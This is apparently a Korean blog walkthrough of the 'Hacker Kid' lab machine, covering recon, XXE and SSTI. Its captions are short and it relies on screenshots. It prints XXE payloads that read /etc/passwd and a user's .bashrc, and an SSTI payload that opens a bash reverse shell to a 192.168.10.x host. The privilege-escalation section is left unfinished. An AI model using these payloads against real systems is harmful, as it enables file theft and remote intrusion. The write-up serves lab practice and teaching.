[+] Hacker Kid (XXE & SSTI)
![](https://blog.kakaocdn.net/dn/bGylHm/btrWCFTBE4G/7DTAPdnm9I9jXh3extwvuK/img.png)
: 80
![](https://blog.kakaocdn.net/dn/wdpdO/btrWCzsrr4O/zy7pTe1mnzeGgWFnfVcuX1/img.png)
> DIG DIG이 힌트인가?
: dig
![](https://blog.kakaocdn.net/dn/wqLlo/btrWDPOEnlH/JnpWa77Iv4JNk1nSJ8q701/img.png)
> IP밖에 몰라 조회가 어려움
: 53 확인
![](https://blog.kakaocdn.net/dn/sXhJe/btrWDcwAJSo/fDRceQducOWgZa2dMxb4O1/img.png)
: 소스코드 확인
![](https://blog.kakaocdn.net/dn/cwuupI/btrWBidJbLI/OzkH9YywboPwmZInEs3JNk/img.png)
> 주석 처리된 버튼 있는데
어차피 앵커가 빈 값
제거하면,
![](https://blog.kakaocdn.net/dn/dCF8We/btrWDnLAh7q/5HdaJmL6GtOblB5EwNtc1K/img.png)
: 다른 주석은
![](https://blog.kakaocdn.net/dn/wRDjT/btrWEK0pVbn/6JKcWySks4g0X6Au5emkn0/img.png)
> Use a Get parameter page_no to view pages.
시키는 대로 해보면 추가 힌트가 주어지고
![](https://blog.kakaocdn.net/dn/IZF9r/btrWChFBwCJ/LmS2CsFELAM2ZVaFLLHvOk/img.png)
: 버프 인터루더로 넘버링을 보내보면
![](https://blog.kakaocdn.net/dn/b0aPSX/btrWEJ8ilaj/R4HUghMUz0lnyCvuyTxcL1/img.png)
> 21번이 값이 다름!
: 붙어보면
![](https://blog.kakaocdn.net/dn/Flunm/btrWD5Rji0T/CwvkHKHikibI1OugMeollK/img.png)
> subdomain 을 알려주고
: 호스트 등록 후
![](https://blog.kakaocdn.net/dn/KWPGY/btrWCdi0Tcc/e4QL3YHroGp1A9j10PVgEk/img.png)
: 다시 DIG
![](https://blog.kakaocdn.net/dn/bBwqFE/btrWEQTNZra/T0nqYmakfWRPY4ErTvHYs0/img.png)
> authority section에 섭도메인 찾음!
: 호스트 다시 등록 후
![](https://blog.kakaocdn.net/dn/cBqD8J/btrWBiENAlT/dbLikKqI0VkBGyRMhqsy4K/img.png)
: 붙어보면
![](https://blog.kakaocdn.net/dn/6x5Me/btrWEfGiT71/jBUhN9KN73AHRgkUKtt5z0/img.png)
![](https://blog.kakaocdn.net/dn/KfmlN/btrWCqh6LJC/qX05C1HkC9MLtOetOt5HCK/img.png)
> 계정 생성 가능한데
: 해보면
![](https://blog.kakaocdn.net/dn/TwgE8/btrWEe8rLcY/2EdAZNvEPxiTvs4oycEDuk/img.png)
: 안됨
: 요청 시 소스를 보면
![](https://blog.kakaocdn.net/dn/0OV2d/btrWCIvVZB7/VfME8yULF147yLsERh3wsk/img.png)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY takudaddy_XXE SYSTEM 'file:///etc/passwd'>]>
<root>
<name>
</name><tel>
</tel><email>
&takudaddy_XXE;
</email><password></password></root>
![](https://blog.kakaocdn.net/dn/IFlX5/btrWBcko8WO/WUoQYl1hJFnWK7p5omTt8K/img.png)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY takudaddy_XXE SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>
<root>
<name>
</name><tel>
</tel><email>
&takudaddy_XXE;
</email><password></password></root>
![](https://blog.kakaocdn.net/dn/Aakh4/btrWCGkEiXg/NGwFC4b9lU0K818J6wJZA1/img.png)
: 디코딩 해 살펴보면
![](https://blog.kakaocdn.net/dn/cFwWRX/btrWEgkT9xO/bjgLgAsdgxdWWk29TnSAo0/img.png)
![](https://blog.kakaocdn.net/dn/VdNKX/btrWCqh6LCb/Qntbm7vXzv7rOMSnLVKfQk/img.png)
어드민 계정 정보 확인이 가능!
2. Exploitation
: 9999
: admin 시도 시
![](https://blog.kakaocdn.net/dn/bOxkyY/btrWCidtMVO/ujkhDvsOInPLQT0XAKWD2K/img.png)
실패!
: saket 사용자로 시도 시
![](https://blog.kakaocdn.net/dn/qVgX8/btrWCHcH8Ly/uxrr8P1FMfaUkkmSFS7Qg0/img.png)
성공! 이름을 말하라고?
: name 파라미터를 붙여보면
![](https://blog.kakaocdn.net/dn/G3aZI/btrWEKMTqYz/8m6JlEAhIbHqKBduXkjrKK/img.png)
![](https://blog.kakaocdn.net/dn/cfGSc8/btrWCHcH8MB/NdetYwqUab0usYvAS2aMU0/img.png)
먹힘!
: 리버스 쉘
{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.10.57/443 0>&1"')}}
# url-encoding 해야함!
{%25+import+os+%25}{{os.system('bash+-c+"bash+-i+>%26+/dev/tcp/192.168.10.58/443+0>%261"')}}
리스너 기동 후
URL-encoding 해
입력하면
![](https://blog.kakaocdn.net/dn/GP1iQ/btrWCh6FuMs/99gLLLjFM1vaRiMXyJw2P1/img.png)
![](https://blog.kakaocdn.net/dn/OdMHf/btrWCHqde1e/5qp0h4LcoEmEDXr0BXvZKK/img.png)
침투 성공!
3. Privilege Escalation
![](https://blog.kakaocdn.net/dn/Ld5XZ/btrWCS6cJpY/XOfA7loC5Q8t884EDOvI40/img.png)
root로 su,
tmp에서
python2.7로 inject.py 번호 실시 후
nc로 5600 포트 붙었었고
root process 확인,
다시 python2.7 inject.py 번호를 실행했고
다시 5600 붙었음.
확인해 본다
linpeas.sh
![](https://blog.kakaocdn.net/dn/bpSNTK/btrWKnEHwX3/JnvDCk8RA7NIKml6d7ROOK/img.png)
![](https://blog.kakaocdn.net/dn/TgfhE/btrWLU9EprD/auJDSo65ISboI6oqaW0wj1/img.png)
![](https://blog.kakaocdn.net/dn/bv3361/btrWIXtHJn9/x5BowOq1motFuk52h4eXik/img.png)
위 블로그에서 올라와 있던
python 스크립트가 삭제되어
exploit을 따로 제작해야함
추후 진행